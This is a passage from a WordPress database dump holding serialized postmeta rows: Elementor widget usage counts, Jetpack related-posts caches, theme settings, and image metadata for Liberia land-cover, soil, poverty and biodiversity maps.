ed\";a:1:{s:11:\"css_classes\";i:1;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:4;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:8:{s:11:\"title_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;s:22:\"typography_font_weight\";i:1;s:22:\"typography_font_family\";i:1;s:23:\"text_shadow_text_shadow\";i:1;s:22:\"typography_line_height\";i:1;s:25:\"typography_letter_spacing\";i:1;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:3;s:8:\"controls\";a:3:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:2:{s:6:\"editor\";i:1;s:10:\"column_gap\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:5:{s:5:\"align\";i:1;s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:22:\"typography_font_weight\";i:1;s:22:\"typography_line_height\";i:1;}}s:8:\"advanced\";a:1:{s:14:\"_section_style\";a:1:{s:8:\"_padding\";i:1;}}}}s:6:\"button\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:4;s:8:\"controls\";a:3:{s:7:\"content\";a:1:{s:14:\"section_button\";a:3:{s:4:\"text\";i:1;s:4:\"link\";i:1;s:5:\"align\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:12:{s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;s:22:\"typography_font_weight\";i:1;s:25:\"typography_text_transform\";i:1;s:17:\"button_text_color\";i:1;s:16:\"background_color\";i:1;s:11:\"hover_color\";i:1;s:29:\"button_background_hover_color\";i:1;s:13:\"border_border\";i:1;s:12:\"border_width\";i:1;s:12:\"border_color\";i:1;s:13:\"border_radius\";i:1;}}s:8:\"advanced\";a:1:{s:14:\"_section_style\";a:1:{s:8:\"_padding\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:1;s:8:\"controls\";a:3:{s:6:\"layout\";a:3:{s:14:\"section_layout\";a:3:{s:16:\"content_position\";i:2;s:6:\"layout\";i:3;s:3:\"gap\";i:2;}s:17:\"section_structure\";a:1:{s:9:\"structure\";i:2;}s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:4;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:3:{s:7:\"padding\";i:2;s:14:\"padding_tablet\";i:1;s:11:\"css_classes\";i:1;}}s:5:\"style\";a:1:{s:18:\"section_background\";a:2:{s:21:\"background_background\";i:1;s:16:\"background_color\";i:1;}}}}s:7:\"oew-nav\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:11:\"section_nav\";a:2:{s:19:\"navigation_position\";i:1;s:26:\"navigation_position_mobile\";i:1;}}s:5:\"style\";a:1:{s:18:\"section_navigation\";a:3:{s:26:\"navigation_typo_typography\";i:1;s:32:\"navigation_typo_font_size_tablet\";i:1;s:32:\"navigation_typo_font_size_mobile\";i:1;}}}}}'),(19990,1870,'_jetpack_related_posts_cache','a:1:{s:32:\"cb296ed3ffbce3138fead246766dd8cd\";a:2:{s:7:\"expires\";i:1629090125;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3691;}i:1;a:1:{s:2:\"id\";i:3694;}i:2;a:1:{s:2:\"id\";i:1877;}}}}'),(19991,1709,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1627561789;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1749;}i:1;a:1:{s:2:\"id\";i:1772;}i:2;a:1:{s:2:\"id\";i:2991;}}}}'),(19992,2928,'_wp_attached_file','2019/11/country_forest_cover.png'),(19993,2928,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:427;s:4:\"file\";s:32:\"2019/11/country_forest_cover.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"country_forest_cover-211x300.png\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"country_forest_cover-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(19994,1709,'_pods_file_type_image','a:1:{i:0;i:2928;}'),(19998,2296,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1625134762;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:2293;}i:1;a:1:{s:2:\"id\";i:1751;}i:2;a:1:{s:2:\"id\";i:1718;}}}}'),(19999,1743,'_jetpack_related_posts_cache','a:2:{s:32:\"3614416705f7ccfa1d544bc6a7691151\";a:2:{s:7:\"expires\";i:1628131108;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3099;}i:1;a:1:{s:2:\"id\";i:1772;}i:2;a:1:{s:2:\"id\";i:1774;}}}s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628147264;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3099;}i:1;a:1:{s:2:\"id\";i:1772;}i:2;a:1:{s:2:\"id\";i:1774;}}}}'),(20000,1782,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628141077;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1780;}i:1;a:1:{s:2:\"id\";i:3257;}i:2;a:1:{s:2:\"id\";i:3249;}}}}'),(20009,1584,'_jetpack_related_posts_cache','a:1:{s:32:\"387e53bc056fb081449b6ed79a90f200\";a:2:{s:7:\"expires\";i:1627089177;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1604;}i:1;a:1:{s:2:\"id\";i:1582;}i:2;a:1:{s:2:\"id\";i:1606;}}}}'),(20011,1544,'_jetpack_related_posts_cache','a:1:{s:32:\"387e53bc056fb081449b6ed79a90f200\";a:2:{s:7:\"expires\";i:1628754129;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1582;}i:1;a:1:{s:2:\"id\";i:2457;}i:2;a:1:{s:2:\"id\";i:1604;}}}}'),(20012,1594,'_jetpack_related_posts_cache','a:1:{s:32:\"387e53bc056fb081449b6ed79a90f200\";a:2:{s:7:\"expires\";i:1629026607;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1610;}i:1;a:1:{s:2:\"id\";i:1600;}i:2;a:1:{s:2:\"id\";i:2704;}}}}'),(20013,482,'_jetpack_related_posts_cache','a:1:{s:32:\"089eac97c449e1cc8677319ff6720a8f\";a:2:{s:7:\"expires\";i:1628486906;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:483;}i:1;a:1:{s:2:\"id\";i:477;}i:2;a:1:{s:2:\"id\";i:484;}}}}'),(20014,477,'_jetpack_related_posts_cache','a:1:{s:32:\"089eac97c449e1cc8677319ff6720a8f\";a:2:{s:7:\"expires\";i:1628519821;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:486;}i:1;a:1:{s:2:\"id\";i:482;}i:2;a:1:{s:2:\"id\";i:483;}}}}'),(20015,1695,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628513169;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:570;}i:1;a:1:{s:2:\"id\";i:3092;}i:2;a:1:{s:2:\"id\";i:3096;}}}}'),(20016,570,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1629060400;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3099;}i:1;a:1:{s:2:\"id\";i:2609;}i:2;a:1:{s:2:\"id\";i:3079;}}}}'),(20017,480,'_jetpack_related_posts_cache','a:1:{s:32:\"089eac97c449e1cc8677319ff6720a8f\";a:2:{s:7:\"expires\";i:1628849858;s:7:\"payload\";a:0:{}}}'),(20018,2309,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1629071405;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:2159;}i:1;a:1:{s:2:\"id\";i:3099;}i:2;a:1:{s:2:\"id\";i:3109;}}}}'),(20019,2609,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1629107184;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3251;}i:1;a:1:{s:2:\"id\";i:3261;}i:2;a:1:{s:2:\"id\";i:570;}}}}'),(20020,2558,'_jetpack_related_posts_cache','a:1:{s:32:\"d65876263e6f4c3fb6c0fd6f49c644ce\";a:2:{s:7:\"expires\";i:1628608710;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:2775;}i:1;a:1:{s:2:\"id\";i:2748;}i:2;a:1:{s:2:\"id\";i:2617;}}}}'),(20021,2252,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1626888282;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3275;}i:1;a:1:{s:2:\"id\";i:3102;}i:2;a:1:{s:2:\"id\";i:1749;}}}}'),(20022,2748,'_jetpack_related_posts_cache','a:1:{s:32:\"d65876263e6f4c3fb6c0fd6f49c644ce\";a:2:{s:7:\"expires\";i:1626169088;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:2558;}i:1;a:1:{s:2:\"id\";i:2617;}i:2;a:1:{s:2:\"id\";i:2775;}}}}'),(20023,2617,'_jetpack_related_posts_cache','a:1:{s:32:\"d65876263e6f4c3fb6c0fd6f49c644ce\";a:2:{s:7:\"expires\";i:1628900039;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:2775;}i:1;a:1:{s:2:\"id\";i:2558;}i:2;a:1:{s:2:\"id\";i:2748;}}}}'),(20024,2293,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1625190563;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:2296;}i:1;a:1:{s:2:\"id\";i:1751;}i:2;a:1:{s:2:\"id\";i:1718;}}}}'),(20029,1602,'_jetpack_related_posts_cache','a:1:{s:32:\"387e53bc056fb081449b6ed79a90f200\";a:2:{s:7:\"expires\";i:1629099088;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1582;}i:1;a:1:{s:2:\"id\";i:1608;}i:2;a:1:{s:2:\"id\";i:1544;}}}}'),(20030,2935,'_wp_attached_file','2019/12/featured_news_plastic_waste.png'),(20031,2935,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:554;s:4:\"file\";s:39:\"2019/12/featured_news_plastic_waste.png\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:39:\"featured_news_plastic_waste-300x162.png\";s:5:\"width\";i:300;s:6:\"height\";i:162;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"featured_news_plastic_waste-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:39:\"featured_news_plastic_waste-768x416.png\";s:5:\"width\";i:768;s:6:\"height\";i:416;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(20032,2911,'_elementor_controls_usage','a:0:{}'),(20035,2911,'_thumbnail_id','2935'),(20036,2911,'_edit_last','1'),(20037,2911,'ocean_gallery_link_images','off'),(20038,2911,'ocean_sidebar','0'),(20039,2911,'ocean_second_sidebar','0'),(20040,2911,'ocean_disable_margins','enable'),(20041,2911,'ocean_display_top_bar','default'),(20042,2911,'ocean_display_header','default'),(20043,2911,'ocean_center_header_left_menu','0'),(20044,2911,'ocean_custom_header_template','0'),(20045,2911,'ocean_header_custom_menu','0'),(20046,2911,'ocean_menu_typo_font_family','0'),(20047,2911,'ocean_disable_title','default'),(20048,2911,'ocean_disable_heading','default'),(20049,2911,'ocean_disable_breadcrumbs','default'),(20050,2911,'ocean_display_footer_widgets','default'),(20051,2911,'ocean_display_footer_bottom','default'),(20052,2911,'ocean_custom_footer_template','0'),(20053,2911,'ocean_link_format_target','self'),(20054,2911,'ocean_quote_format_link','post'),(20055,2911,'osh_disable_topbar_sticky','default'),(20056,2911,'osh_disable_header_sticky','default'),(20057,2911,'osh_sticky_header_style','default'),(20063,2248,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1629103661;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1722;}i:1;a:1:{s:2:\"id\";i:3087;}i:2;a:1:{s:2:\"id\";i:3275;}}}}'),(20079,1699,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1624041725;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1703;}i:1;a:1:{s:2:\"id\";i:1707;}i:2;a:1:{s:2:\"id\";i:3097;}}}}'),(20082,1872,'_jetpack_related_posts_cache','a:2:{s:32:\"cb296ed3ffbce3138fead246766dd8cd\";a:2:{s:7:\"expires\";i:1628649069;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1877;}i:1;a:1:{s:2:\"id\";i:1870;}i:2;a:1:{s:2:\"id\";i:3664;}}}s:32:\"3fec0a4446713306ccf8da5f38491b39\";a:2:{s:7:\"expires\";i:1628654073;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1877;}i:1;a:1:{s:2:\"id\";i:3664;}i:2;a:1:{s:2:\"id\";i:3691;}}}}'),(20087,484,'_jetpack_related_posts_cache','a:1:{s:32:\"089eac97c449e1cc8677319ff6720a8f\";a:2:{s:7:\"expires\";i:1629064817;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:477;}i:1;a:1:{s:2:\"id\";i:482;}i:2;a:1:{s:2:\"id\";i:483;}}}}'),(20097,2939,'_wp_attached_file','2019/11/Liberia-Aligned-NAP.pdf'),(20098,1872,'_elementor_edit_mode','builder'),(20099,1872,'_elementor_template_type','wp-post'),(20100,2940,'_elementor_version','2.8.1'),(20101,2940,'_thumbnail_id','1855'),(20102,2940,'_wp_page_template','default'),(20103,2940,'_elementor_controls_usage','a:0:{}'),(20104,2940,'_elementor_edit_mode','builder'),(20105,2940,'_elementor_template_type','wp-post'),(20106,2942,'_wp_attached_file','2019/12/Liberia-Land-Cover-Map-2015-scaled.jpg'),(20107,2942,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2560;s:6:\"height\";i:1978;s:4:\"file\";s:46:\"2019/12/Liberia-Land-Cover-Map-2015-scaled.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:39:\"Liberia-Land-Cover-Map-2015-300x232.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:232;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:40:\"Liberia-Land-Cover-Map-2015-1024x791.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:791;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"Liberia-Land-Cover-Map-2015-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:39:\"Liberia-Land-Cover-Map-2015-768x593.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:593;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:41:\"Liberia-Land-Cover-Map-2015-1536x1187.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:41:\"Liberia-Land-Cover-Map-2015-2048x1583.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1583;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:31:\"Liberia-Land-Cover-Map-2015.jpg\";}'),(20108,2944,'_wp_attached_file','2019/12/LBR_Soil_Map.png'),(20109,2944,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:5500;s:6:\"height\";i:4250;s:4:\"file\";s:24:\"2019/12/LBR_Soil_Map.png\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"LBR_Soil_Map-300x232.png\";s:5:\"width\";i:300;s:6:\"height\";i:232;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"LBR_Soil_Map-1024x791.png\";s:5:\"width\";i:1024;s:6:\"height\";i:791;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"LBR_Soil_Map-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"LBR_Soil_Map-768x593.png\";s:5:\"width\";i:768;s:6:\"height\";i:593;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:26:\"LBR_Soil_Map-1536x1187.png\";s:5:\"width\";i:1536;s:6:\"height\";i:1187;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:26:\"LBR_Soil_Map-2048x1583.png\";s:5:\"width\";i:2048;s:6:\"height\";i:1583;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(20110,2945,'_wp_attached_file','2019/12/Liberia-Extreme-Poverty-Map-scaled.jpg'),(20111,2945,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2560;s:6:\"height\";i:1978;s:4:\"file\";s:46:\"2019/12/Liberia-Extreme-Poverty-Map-scaled.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:39:\"Liberia-Extreme-Poverty-Map-300x232.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:232;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:40:\"Liberia-Extreme-Poverty-Map-1024x791.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:791;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"Liberia-Extreme-Poverty-Map-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:39:\"Liberia-Extreme-Poverty-Map-768x593.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:593;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:41:\"Liberia-Extreme-Poverty-Map-1536x1187.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:41:\"Liberia-Extreme-Poverty-Map-2048x1583.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1583;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:31:\"Liberia-Extreme-Poverty-Map.jpg\";}'),(20112,2946,'_wp_attached_file','2019/12/Liberia-Land-Cover-Map-2015-1-scaled.jpg'),(20113,2946,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2560;s:6:\"height\";i:1978;s:4:\"file\";s:48:\"2019/12/Liberia-Land-Cover-Map-2015-1-scaled.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:41:\"Liberia-Land-Cover-Map-2015-1-300x232.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:232;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:42:\"Liberia-Land-Cover-Map-2015-1-1024x791.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:791;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:41:\"Liberia-Land-Cover-Map-2015-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:41:\"Liberia-Land-Cover-Map-2015-1-768x593.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:593;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:43:\"Liberia-Land-Cover-Map-2015-1-1536x1187.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:43:\"Liberia-Land-Cover-Map-2015-1-2048x1583.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1583;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:33:\"Liberia-Land-Cover-Map-2015-1.jpg\";}'),(20114,2947,'_wp_attached_file','2019/12/Liberia-Species-Richness-High-Biodiversity-Corridor-Map2-scaled.jpg'),(20115,2947,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2560;s:6:\"height\";i:1978;s:4:\"file\";s:75:\"2019/12/Liberia-Species-Richness-High-Biodiversity-Corridor-Map2-scaled.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:68:\"Liberia-Species-Richness-High-Biodiversity-Corridor-Map2-300x232.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:232;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:69:\"Liberia-Species-Richness-High-Biodiversity-Corridor-Map2-1024x791.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:791;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:68:\"Liberia-Species-Richness-High-Biodiversity-Corridor-Map2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:68:\"Liberia-Species-Richness-High-Biodiversity-Corridor-Map2-768x593.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:593;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:70:\"Liberia-Species-Richness-High-Biodiversity-Corridor-Map2-1536x1187.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:70:\"Liberia-Species-Richness-High-Biodiversity-Corridor-Map2-2048x1583.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1583;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:60:\"Liberia-Species-Richness-High-Biodiversity-Corridor-Map2.jpg\";}'),(20116,2948,'_wp_attached_file','2019/12/Liberia-Extreme-Poverty-Map-1-scaled.jpg'),(20117,2948,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2560;s:6:\"height\";i:1978;s:4:\"file\";s:48:\"2019/12/Liberia-Extreme-Poverty-Map-1-scaled.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:41:\"Liberia-Extreme-Poverty-Map-1-300x232.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:232;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:42:\"Liberia-Extreme-Poverty-Map-1-1024x791.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:791;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:41:\"Liberia-Extreme-Poverty-Map-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:41:\"Liberia-Extreme-Poverty-Map-1-768x593.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:593;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:43:\"Liberia-Extreme-Poverty-Map-1-1536x1187.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:43:\"Liberia-Extreme-Poverty-Map-1-2048x1583.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1583;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:33:\"Liberia-Extreme-Poverty-Map-1.jpg\";}'),(20119,1711,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c